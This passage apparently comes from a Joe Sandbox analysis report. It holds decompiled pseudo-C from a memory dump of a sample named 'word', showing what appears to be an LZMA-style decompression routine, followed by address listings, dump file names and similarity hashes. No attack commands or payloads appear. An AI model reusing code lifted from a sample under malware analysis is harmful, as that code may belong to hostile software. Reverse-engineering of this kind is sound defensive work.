                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							_t484 = __ebp - 0x70;
                                      							 *_t484 =  *(__ebp - 0x70) + 1;
                                      							__eflags =  *_t484;
                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							L148:
                                      							_t487 = __ebp - 0x48;
                                      							 *_t487 =  *(__ebp - 0x48) - 1;
                                      							__eflags =  *_t487;
                                      							L149:
                                      							__eflags =  *(__ebp - 0x48);
                                      							if( *(__ebp - 0x48) <= 0) {
                                      								__ecx =  *(__ebp - 0x40);
                                      								__ebx =  *(__ebp - 0x50);
                                      								0 = 1;
                                      								__eax = 1 << __cl;
                                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                      								__eax =  *(__ebp - 0x7c);
                                      								 *(__ebp - 0x44) = __ebx;
                                      								goto L140;
                                      							}
                                      							__eax =  *(__ebp - 0x50);
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                      							__eax =  *(__ebp - 0x58);
                                      							__esi = __edx + __eax;
                                      							 *(__ebp - 0x54) = __esi;
                                      							__ax =  *__esi;
                                      							__edi = __ax & 0x0000ffff;
                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                      							if( *(__ebp - 0xc) >= __ecx) {
                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      								__cx = __ax;
                                      								__cx = __ax >> 5;
                                      								__eax = __eax - __ecx;
                                      								__edx = __edx + 1;
                                      								__eflags = __edx;
                                      								 *__esi = __ax;
                                      								 *(__ebp - 0x50) = __edx;
                                      							} else {
                                      								 *(__ebp - 0x10) = __ecx;
                                      								0x800 = 0x800 - __edi;
                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                      								 *__esi = __cx;
                                      							}
                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                      								goto L148;
                                      							} else {
                                      								goto L146;
                                      							}
                                      						case 0x19:
                                      							__eflags = __ebx - 4;
                                      							if(__ebx < 4) {
                                      								 *(__ebp - 0x2c) = __ebx;
                                      								L119:
                                      								_t393 = __ebp - 0x2c;
                                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                                      								__eflags =  *_t393;
                                      								L120:
                                      								__eax =  *(__ebp - 0x2c);
                                      								__eflags = __eax;
                                      								if(__eax == 0) {
                                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                      									goto L170;
                                      								}
                                      								__eflags = __eax -  *(__ebp - 0x60);
                                      								if(__eax >  *(__ebp - 0x60)) {
                                      									goto L171;
                                      								}
                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                      								__eax =  *(__ebp - 0x30);
                                      								_t400 = __ebp - 0x60;
                                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                      								__eflags =  *_t400;
                                      								goto L123;
                                      							}
                                      							__ecx = __ebx;
                                      							__eax = __ebx;
                                      							__ecx = __ebx >> 1;
                                      							__eax = __ebx & 0x00000001;
                                      							__ecx = (__ebx >> 1) - 1;
                                      							__al = __al | 0x00000002;
                                      							__eax = (__ebx & 0x00000001) << __cl;
                                      							__eflags = __ebx - 0xe;
                                      							 *(__ebp - 0x2c) = __eax;
                                      							if(__ebx >= 0xe) {
                                      								__ebx = 0;
                                      								 *(__ebp - 0x48) = __ecx;
                                      								L102:
                                      								__eflags =  *(__ebp - 0x48);
                                      								if( *(__ebp - 0x48) <= 0) {
                                      									__eax = __eax + __ebx;
                                      									 *(__ebp - 0x40) = 4;
                                      									 *(__ebp - 0x2c) = __eax;
                                      									__eax =  *(__ebp - 4);
                                      									__eax =  *(__ebp - 4) + 0x644;
                                      									__eflags = __eax;
                                      									L108:
                                      									__ebx = 0;
                                      									 *(__ebp - 0x58) = __eax;
                                      									 *(__ebp - 0x50) = 1;
                                      									 *(__ebp - 0x44) = 0;
                                      									 *(__ebp - 0x48) = 0;
                                      									L112:
                                      									__eax =  *(__ebp - 0x40);
                                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                      										_t391 = __ebp - 0x2c;
                                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                      										__eflags =  *_t391;
                                      										goto L119;
                                      									}
                                      									__eax =  *(__ebp - 0x50);
                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                      									__eax =  *(__ebp - 0x58);
                                      									__esi = __edi + __eax;
                                      									 *(__ebp - 0x54) = __esi;
                                      									__ax =  *__esi;
                                      									__ecx = __ax & 0x0000ffff;
                                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                      									__eflags =  *(__ebp - 0xc) - __edx;
                                      									if( *(__ebp - 0xc) >= __edx) {
                                      										__ecx = 0;
                                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                      										__ecx = 1;
                                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                      										__ebx = 1;
                                      										__ecx =  *(__ebp - 0x48);
                                      										__ebx = 1 << __cl;
                                      										__ecx = 1 << __cl;
                                      										__ebx =  *(__ebp - 0x44);
                                      										__ebx =  *(__ebp - 0x44) | __ecx;
                                      										__cx = __ax;
                                      										__cx = __ax >> 5;
                                      										__eax = __eax - __ecx;
                                      										__edi = __edi + 1;
                                      										__eflags = __edi;
                                      										 *(__ebp - 0x44) = __ebx;
                                      										 *__esi = __ax;
                                      										 *(__ebp - 0x50) = __edi;
                                      									} else {
                                      										 *(__ebp - 0x10) = __edx;
                                      										0x800 = 0x800 - __ecx;
                                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                      										 *__esi = __dx;
                                      									}
                                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      									if( *(__ebp - 0x10) >= 0x1000000) {
                                      										L111:
                                      										_t368 = __ebp - 0x48;
                                      										 *_t368 =  *(__ebp - 0x48) + 1;
                                      										__eflags =  *_t368;
                                      										goto L112;
                                      									} else {
                                      										goto L109;
                                      									}
                                      								}
                                      								__ecx =  *(__ebp - 0xc);
                                      								__ebx = __ebx + __ebx;
                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      								 *(__ebp - 0x44) = __ebx;
                                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                      									__ecx =  *(__ebp - 0x10);
                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      									__ebx = __ebx | 0x00000001;
                                      									__eflags = __ebx;
                                      									 *(__ebp - 0x44) = __ebx;
                                      								}
                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                      									L101:
                                      									_t338 = __ebp - 0x48;
                                      									 *_t338 =  *(__ebp - 0x48) - 1;
                                      									__eflags =  *_t338;
                                      									goto L102;
                                      								} else {
                                      									goto L99;
                                      								}
                                      							}
                                      							__edx =  *(__ebp - 4);
                                      							__eax = __eax - __ebx;
                                      							 *(__ebp - 0x40) = __ecx;
                                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                      							goto L108;
                                      						case 0x1a:
                                      							goto L55;
                                      						case 0x1b:
                                      							L75:
                                      							__eflags =  *(__ebp - 0x64);
                                      							if( *(__ebp - 0x64) == 0) {
                                      								 *(__ebp - 0x88) = 0x1b;
                                      								goto L170;
                                      							}
                                      							__eax =  *(__ebp - 0x14);
                                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      							__eflags = __eax -  *(__ebp - 0x74);
                                      							if(__eax >=  *(__ebp - 0x74)) {
                                      								__eax = __eax +  *(__ebp - 0x74);
                                      								__eflags = __eax;
                                      							}
                                      							__edx =  *(__ebp - 8);
                                      							__cl =  *(__eax + __edx);
                                      							__eax =  *(__ebp - 0x14);
                                      							 *(__ebp - 0x5c) = __cl;
                                      							 *(__eax + __edx) = __cl;
                                      							__eax = __eax + 1;
                                      							__edx = 0;
                                      							_t274 = __eax %  *(__ebp - 0x74);
                                      							__eax = __eax /  *(__ebp - 0x74);
                                      							__edx = _t274;
                                      							__eax =  *(__ebp - 0x68);
                                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      							_t283 = __ebp - 0x64;
                                      							 *_t283 =  *(__ebp - 0x64) - 1;
                                      							__eflags =  *_t283;
                                      							 *( *(__ebp - 0x68)) = __cl;
                                      							goto L79;
                                      						case 0x1c:
                                      							while(1) {
                                      								L123:
                                      								__eflags =  *(__ebp - 0x64);
                                      								if( *(__ebp - 0x64) == 0) {
                                      									break;
                                      								}
                                      								__eax =  *(__ebp - 0x14);
                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      								__eflags = __eax -  *(__ebp - 0x74);
                                      								if(__eax >=  *(__ebp - 0x74)) {
                                      									__eax = __eax +  *(__ebp - 0x74);
                                      									__eflags = __eax;
                                      								}
                                      								__edx =  *(__ebp - 8);
                                      								__cl =  *(__eax + __edx);
                                      								__eax =  *(__ebp - 0x14);
                                      								 *(__ebp - 0x5c) = __cl;
                                      								 *(__eax + __edx) = __cl;
                                      								__eax = __eax + 1;
                                      								__edx = 0;
                                      								_t414 = __eax %  *(__ebp - 0x74);
                                      								__eax = __eax /  *(__ebp - 0x74);
                                      								__edx = _t414;
                                      								__eax =  *(__ebp - 0x68);
                                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                      								__eflags =  *(__ebp - 0x30);
                                      								 *( *(__ebp - 0x68)) = __cl;
                                      								 *(__ebp - 0x14) = __edx;
                                      								if( *(__ebp - 0x30) > 0) {
                                      									continue;
                                      								} else {
                                      									goto L80;
                                      								}
                                      							}
                                      							 *(__ebp - 0x88) = 0x1c;
                                      							goto L170;
                                      					}
                                      				}
                                      			}













                                      0x00000000
                                      0x00406d5f
                                      0x00406d5f
                                      0x00406d64
                                      0x00406ddb
                                      0x00406de2
                                      0x00406dec
                                      0x004073cb
                                      0x004073cb
                                      0x004073ce
                                      0x004073ce
                                      0x004073d4
                                      0x004073da
                                      0x004073e0
                                      0x004073fa
                                      0x004073fd
                                      0x00407403
                                      0x0040740e
                                      0x00407410
                                      0x004073e2
                                      0x004073e2
                                      0x004073f1
                                      0x004073f5
                                      0x004073f5
                                      0x0040741a
                                      0x00407441
                                      0x00407441
                                      0x00407447
                                      0x00407447
                                      0x00000000
                                      0x0040741c
                                      0x0040741c
                                      0x00407420
                                      0x004075cf
                                      0x00000000
                                      0x004075cf
                                      0x0040742c
                                      0x00407433
                                      0x0040743b
                                      0x0040743e
                                      0x00000000
                                      0x0040743e
                                      0x00406d66
                                      0x00406d66
                                      0x00406d6a
                                      0x00406d72
                                      0x00406d75
                                      0x00406d77
                                      0x00406d7a
                                      0x00406d7c
                                      0x00406d81
                                      0x00406d84
                                      0x00406d8b
                                      0x00406d92
                                      0x00406d95
                                      0x00406da0
                                      0x00406da8
                                      0x00406da8
                                      0x00406da2
                                      0x00406da2
                                      0x00406da2
                                      0x00406d97
                                      0x00406d97
                                      0x00406d97
                                      0x00406daf
                                      0x00406dcd
                                      0x00406dcf
                                      0x00406fa2
                                      0x00406fa2
                                      0x00406fa5
                                      0x00406fa8
                                      0x00406fab
                                      0x00406fae
                                      0x00406fb1
                                      0x00406fb4
                                      0x00406fb7
                                      0x00406fba
                                      0x00406fc0
                                      0x00406fd8
                                      0x00406fdb
                                      0x00406fde
                                      0x00406fe1
                                      0x00406fe1
                                      0x00406fe4
                                      0x00406fea
                                      0x00406fc2
                                      0x00406fc2
                                      0x00406fca
                                      0x00406fcf
                                      0x00406fd1
                                      0x00406fd3
                                      0x00406fd3
                                      0x00406ff4
                                      0x00406ff7
                                      0x00406f9a
                                      0x00406fa0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406ff9
                                      0x00406f75
                                      0x00406f79
                                      0x00407581
                                      0x00000000
                                      0x00407581
                                      0x00406f7f
                                      0x00406f82
                                      0x00406f85
                                      0x00406f89
                                      0x00406f8c
                                      0x00406f92
                                      0x00406f94
                                      0x00406f94
                                      0x00406f97
                                      0x00000000
                                      0x00406f97
                                      0x00406db1
                                      0x00406db1
                                      0x00406db4
                                      0x00406dba
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbf
                                      0x00406dc2
                                      0x00406dc4
                                      0x00406dc5
                                      0x00406dc8
                                      0x00406e35
                                      0x00406e35
                                      0x00406e39
                                      0x00406e3c
                                      0x00406e3f
                                      0x00406e42
                                      0x00406e45
                                      0x00406e46
                                      0x00406e49
                                      0x00406e4b
                                      0x00406e51
                                      0x00406e54
                                      0x00406e57
                                      0x00406e5a
                                      0x00406e5d
                                      0x00406e63
                                      0x00406e7f
                                      0x00406e82
                                      0x00406e85
                                      0x00406e88
                                      0x00406e8f
                                      0x00406e95
                                      0x00406e99
                                      0x00406e65
                                      0x00406e65
                                      0x00406e69
                                      0x00406e71
                                      0x00406e76
                                      0x00406e78
                                      0x00406e7a
                                      0x00406e7a
                                      0x00406ea3
                                      0x00406ea6
                                      0x00406e1d
                                      0x00406e1d
                                      0x00406e23
                                      0x00406ed6
                                      0x00406edc
                                      0x00000000
                                      0x00000000
                                      0x00406ede
                                      0x00406ee1
                                      0x00406ee4
                                      0x00406ee7
                                      0x00406eea
                                      0x00406eed
                                      0x00406ef0
                                      0x00406ef3
                                      0x00406ef6
                                      0x00406efc
                                      0x00406f14
                                      0x00406f17
                                      0x00406f1a
                                      0x00406f1d
                                      0x00406f1d
                                      0x00406f20
                                      0x00406f26
                                      0x00406efe
                                      0x00406efe
                                      0x00406f06
                                      0x00406f0b
                                      0x00406f0d
                                      0x00406f0f
                                      0x00406f0f
                                      0x00406f30
                                      0x00406f33
                                      0x00406eb1
                                      0x00406eb5
                                      0x00407575
                                      0x00000000
                                      0x00407575
                                      0x00406ebb
                                      0x00406ebe
                                      0x00406ec1
                                      0x00406ec5
                                      0x00406ec8
                                      0x00406ece
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed3
                                      0x00406ed3
                                      0x00406f33
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3e
                                      0x00406f3e
                                      0x00406f41
                                      0x00406f44
                                      0x00406f48
                                      0x0040758d
                                      0x00000000
                                      0x0040758d
                                      0x00406f4e
                                      0x00406f51
                                      0x00406f54
                                      0x00406f57
                                      0x00406f5a
                                      0x00406f5d
                                      0x00406f60
                                      0x00406f62
                                      0x00406f65
                                      0x00406f68
                                      0x00406f6b
                                      0x00406f6d
                                      0x00406f6d
                                      0x00406f6d
                                      0x0040710a
                                      0x0040710a
                                      0x0040710d
                                      0x0040710d
                                      0x00000000
                                      0x0040710d
                                      0x00406e2f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406eac
                                      0x00406df8
                                      0x00406dfc
                                      0x00407569
                                      0x004075e5
                                      0x004075ed
                                      0x004075f4
                                      0x004075f6
                                      0x004075fd
                                      0x00407601
                                      0x00407601
                                      0x00406e02
                                      0x00406e05
                                      0x00406e08
                                      0x00406e0c
                                      0x00406e0f
                                      0x00406e15
                                      0x00406e17
                                      0x00406e17
                                      0x00406e1a
                                      0x00000000
                                      0x00406e1a
                                      0x00406ea6
                                      0x00406daf
                                      0x00406be3
                                      0x00406be3
                                      0x00406bec
                                      0x004075fa
                                      0x004075fa
                                      0x00000000
                                      0x004075fa
                                      0x00406bf2
                                      0x00000000
                                      0x00406bfd
                                      0x00000000
                                      0x00000000
                                      0x00406c06
                                      0x00406c09
                                      0x00406c0c
                                      0x00406c10
                                      0x00000000
                                      0x00000000
                                      0x00406c16
                                      0x00406c19
                                      0x00406c1b
                                      0x00406c1c
                                      0x00406c1f
                                      0x00406c21
                                      0x00406c22
                                      0x00406c24
                                      0x00406c27
                                      0x00406c2c
                                      0x00406c31
                                      0x00406c3a
                                      0x00406c4d
                                      0x00406c50
                                      0x00406c5c
                                      0x00406c84
                                      0x00406c86
                                      0x00406c94
                                      0x00406c94
                                      0x00406c98
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406c88
                                      0x00406c88
                                      0x00406c8b
                                      0x00406c8c
                                      0x00406c8c
                                      0x00000000
                                      0x00406c88
                                      0x00406c62
                                      0x00406c67
                                      0x00406c67
                                      0x00406c70
                                      0x00406c78
                                      0x00406c7b
                                      0x00000000
                                      0x00406c81
                                      0x00406c81
                                      0x00000000
                                      0x00406c81
                                      0x00000000
                                      0x00406c9e
                                      0x00406c9e
                                      0x00406ca2
                                      0x0040754e
                                      0x00000000
                                      0x0040754e
                                      0x00406cab
                                      0x00406cbb
                                      0x00406cbe
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc4
                                      0x00406cc8
                                      0x00000000
                                      0x00000000
                                      0x00406cca
                                      0x00406cd0
                                      0x00406cfa
                                      0x00406d00
                                      0x00406d07
                                      0x00000000
                                      0x00406d07
                                      0x00406cd6
                                      0x00406cd9
                                      0x00406cde
                                      0x00406cde
                                      0x00406ce9
                                      0x00406cf1
                                      0x00406cf4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406d39
                                      0x00406d3f
                                      0x00406d42
                                      0x00406d4f
                                      0x00406d57
                                      0x00000000
                                      0x00000000
                                      0x00406d0e
                                      0x00406d0e
                                      0x00406d12
                                      0x0040755d
                                      0x00000000
                                      0x0040755d
                                      0x00406d1e
                                      0x00406d29
                                      0x00406d29
                                      0x00406d29
                                      0x00406d2c
                                      0x00406d2f
                                      0x00406d32
                                      0x00406d37
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406ffe
                                      0x00407002
                                      0x00407020
                                      0x00407023
                                      0x0040702a
                                      0x0040702d
                                      0x00407030
                                      0x00407033
                                      0x00407036
                                      0x00407039
                                      0x0040703b
                                      0x00407042
                                      0x00407043
                                      0x00407045
                                      0x00407048
                                      0x0040704b
                                      0x0040704e
                                      0x0040704e
                                      0x00407053
                                      0x00000000
                                      0x00407053
                                      0x00407004
                                      0x00407007
                                      0x0040700a
                                      0x00407014
                                      0x00000000
                                      0x00000000
                                      0x00407068
                                      0x0040706c
                                      0x0040708f
                                      0x00407092
                                      0x00407095
                                      0x0040709f
                                      0x0040706e
                                      0x0040706e
                                      0x00407071
                                      0x00407074
                                      0x00407077
                                      0x00407084
                                      0x00407087
                                      0x00407087
                                      0x00000000
                                      0x00000000
                                      0x004070ab
                                      0x004070af
                                      0x00000000
                                      0x00000000
                                      0x004070b5
                                      0x004070b9
                                      0x00000000
                                      0x00000000
                                      0x004070bf
                                      0x004070c1
                                      0x004070c5
                                      0x004070c5
                                      0x004070c8
                                      0x004070cc
                                      0x00000000
                                      0x00000000
                                      0x0040711c
                                      0x00407120
                                      0x00407127
                                      0x0040712a
                                      0x0040712d
                                      0x00407137
                                      0x00000000
                                      0x00407137
                                      0x00407122
                                      0x00000000
                                      0x00000000
                                      0x00407143
                                      0x00407147
                                      0x0040714e
                                      0x00407151
                                      0x00407154
                                      0x00407149
                                      0x00407149
                                      0x00407149
                                      0x00407157
                                      0x0040715a
                                      0x0040715d
                                      0x0040715d
                                      0x00407160
                                      0x00407163
                                      0x00407166
                                      0x00407166
                                      0x00407169
                                      0x00407170
                                      0x00407175
                                      0x00000000
                                      0x00000000
                                      0x00407203
                                      0x00407203
                                      0x00407207
                                      0x004075a5
                                      0x00000000
                                      0x004075a5
                                      0x0040720d
                                      0x00407210
                                      0x00407213
                                      0x00407217
                                      0x0040721a
                                      0x00407220
                                      0x00407222
                                      0x00407222
                                      0x00407222
                                      0x00407225
                                      0x00407228
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407286
                                      0x00407286
                                      0x0040728a
                                      0x004075b1
                                      0x00000000
                                      0x004075b1
                                      0x00407290
                                      0x00407293
                                      0x00407296
                                      0x0040729a
                                      0x0040729d
                                      0x004072a3
                                      0x004072a5
                                      0x004072a5
                                      0x004072a5
                                      0x004072a8
                                      0x00000000
                                      0x00000000
                                      0x00407056
                                      0x00407056
                                      0x00407059
                                      0x00000000
                                      0x00000000
                                      0x00407395
                                      0x00407399
                                      0x004073bb
                                      0x004073be
                                      0x004073c8
                                      0x00000000
                                      0x004073c8
                                      0x0040739b
                                      0x0040739e
                                      0x004073a2
                                      0x004073a5
                                      0x004073a5
                                      0x004073a8
                                      0x00000000
                                      0x00000000
                                      0x00407452
                                      0x00407456
                                      0x00407474
                                      0x00407474
                                      0x00407474
                                      0x0040747b
                                      0x00407482
                                      0x00407489
                                      0x00407489
                                      0x00000000
                                      0x00407489
                                      0x00407458
                                      0x0040745b
                                      0x0040745e
                                      0x00407461
                                      0x00407468
                                      0x004073ac
                                      0x004073ac
                                      0x004073af
                                      0x00000000
                                      0x00000000
                                      0x00407543
                                      0x00407546
                                      0x00000000
                                      0x00000000
                                      0x0040717d
                                      0x0040717f
                                      0x00407186
                                      0x00407187
                                      0x00407189
                                      0x0040718c
                                      0x00000000
                                      0x00000000
                                      0x00407194
                                      0x00407197
                                      0x0040719a
                                      0x0040719c
                                      0x0040719e
                                      0x0040719e
                                      0x0040719f
                                      0x004071a2
                                      0x004071a9
                                      0x004071ac
                                      0x004071ba
                                      0x00000000
                                      0x00000000
                                      0x00407490
                                      0x00407490
                                      0x00407493
                                      0x0040749a
                                      0x00000000
                                      0x00000000
                                      0x0040749f
                                      0x0040749f
                                      0x004074a3
                                      0x004075db
                                      0x00000000
                                      0x004075db
                                      0x004074a9
                                      0x004074ac
                                      0x004074af
                                      0x004074b3
                                      0x004074b6
                                      0x004074bc
                                      0x004074be
                                      0x004074be
                                      0x004074be
                                      0x004074c1
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c7
                                      0x004074c7
                                      0x004074cb
                                      0x0040752b
                                      0x0040752e
                                      0x00407533
                                      0x00407534
                                      0x00407536
                                      0x00407538
                                      0x0040753b
                                      0x00000000
                                      0x0040753b
                                      0x004074cd
                                      0x004074d3
                                      0x004074d6
                                      0x004074d9
                                      0x004074dc
                                      0x004074df
                                      0x004074e2
                                      0x004074e5
                                      0x004074e8
                                      0x004074eb
                                      0x004074ee
                                      0x00407507
                                      0x0040750a
                                      0x0040750d
                                      0x00407510
                                      0x00407514
                                      0x00407516
                                      0x00407516
                                      0x00407517
                                      0x0040751a
                                      0x004074f0
                                      0x004074f0
                                      0x004074f8
                                      0x004074fd
                                      0x004074ff
                                      0x00407502
                                      0x00407502
                                      0x0040751d
                                      0x00407524
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x004071c2
                                      0x004071c5
                                      0x004071fb
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732e
                                      0x0040732e
                                      0x00407331
                                      0x00407333
                                      0x004075bd
                                      0x00000000
                                      0x004075bd
                                      0x00407339
                                      0x0040733c
                                      0x00000000
                                      0x00000000
                                      0x00407342
                                      0x00407346
                                      0x00407349
                                      0x00407349
                                      0x00407349
                                      0x00000000
                                      0x00407349
                                      0x004071c7
                                      0x004071c9
                                      0x004071cb
                                      0x004071cd
                                      0x004071d0
                                      0x004071d1
                                      0x004071d3
                                      0x004071d5
                                      0x004071d8
                                      0x004071db
                                      0x004071f1
                                      0x004071f6
                                      0x0040722e
                                      0x0040722e
                                      0x00407232
                                      0x0040725e
                                      0x00407260
                                      0x00407267
                                      0x0040726a
                                      0x0040726d
                                      0x0040726d
                                      0x00407272
                                      0x00407272
                                      0x00407274
                                      0x00407277
                                      0x0040727e
                                      0x00407281
                                      0x004072ae
                                      0x004072ae
                                      0x004072b1
                                      0x004072b4
                                      0x00407328
                                      0x00407328
                                      0x00407328
                                      0x00000000
                                      0x00407328
                                      0x004072b6
                                      0x004072bc
                                      0x004072bf
                                      0x004072c2
                                      0x004072c5
                                      0x004072c8
                                      0x004072cb
                                      0x004072ce
                                      0x004072d1
                                      0x004072d4
                                      0x004072d7
                                      0x004072f0
                                      0x004072f2
                                      0x004072f5
                                      0x004072f6
                                      0x004072f9
                                      0x004072fb
                                      0x004072fe
                                      0x00407300
                                      0x00407302
                                      0x00407305
                                      0x00407307
                                      0x0040730a
                                      0x0040730e
                                      0x00407310
                                      0x00407310
                                      0x00407311
                                      0x00407314
                                      0x00407317
                                      0x004072d9
                                      0x004072d9
                                      0x004072e1
                                      0x004072e6
                                      0x004072e8
                                      0x004072eb
                                      0x004072eb
                                      0x0040731a
                                      0x00407321
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x00000000
                                      0x00407323
                                      0x00000000
                                      0x00407323
                                      0x00407321
                                      0x00407234
                                      0x00407237
                                      0x00407239
                                      0x0040723c
                                      0x0040723f
                                      0x00407242
                                      0x00407244
                                      0x00407247
                                      0x0040724a
                                      0x0040724a
                                      0x0040724d
                                      0x0040724d
                                      0x00407250
                                      0x00407257
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x00000000
                                      0x00407259
                                      0x00000000
                                      0x00407259
                                      0x00407257
                                      0x004071dd
                                      0x004071e0
                                      0x004071e2
                                      0x004071e5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004070cf
                                      0x004070cf
                                      0x004070d3
                                      0x00407599
                                      0x00000000
                                      0x00407599
                                      0x004070d9
                                      0x004070dc
                                      0x004070df
                                      0x004070e2
                                      0x004070e4
                                      0x004070e4
                                      0x004070e4
                                      0x004070e7
                                      0x004070ea
                                      0x004070ed
                                      0x004070f0
                                      0x004070f3
                                      0x004070f6
                                      0x004070f7
                                      0x004070f9
                                      0x004070f9
                                      0x004070f9
                                      0x004070fc
                                      0x004070ff
                                      0x00407102
                                      0x00407105
                                      0x00407105
                                      0x00407105
                                      0x00407108
                                      0x00000000
                                      0x00000000
                                      0x0040734c
                                      0x0040734c
                                      0x0040734c
                                      0x00407350
                                      0x00000000
                                      0x00000000
                                      0x00407356
                                      0x00407359
                                      0x0040735c
                                      0x0040735f
                                      0x00407361
                                      0x00407361
                                      0x00407361
                                      0x00407364
                                      0x00407367
                                      0x0040736a
                                      0x0040736d
                                      0x00407370
                                      0x00407373
                                      0x00407374
                                      0x00407376
                                      0x00407376
                                      0x00407376
                                      0x00407379
                                      0x0040737c
                                      0x0040737f
                                      0x00407382
                                      0x00407385
                                      0x00407389
                                      0x0040738b
                                      0x0040738e
                                      0x00000000
                                      0x00407390
                                      0x00000000
                                      0x00407390
                                      0x0040738e
                                      0x004075c3
                                      0x00000000
                                      0x00000000
                                      0x00406bf2

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                      • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                      • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                      • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040699E(WCHAR* _a4) {
                                      				void* _t2;
                                      
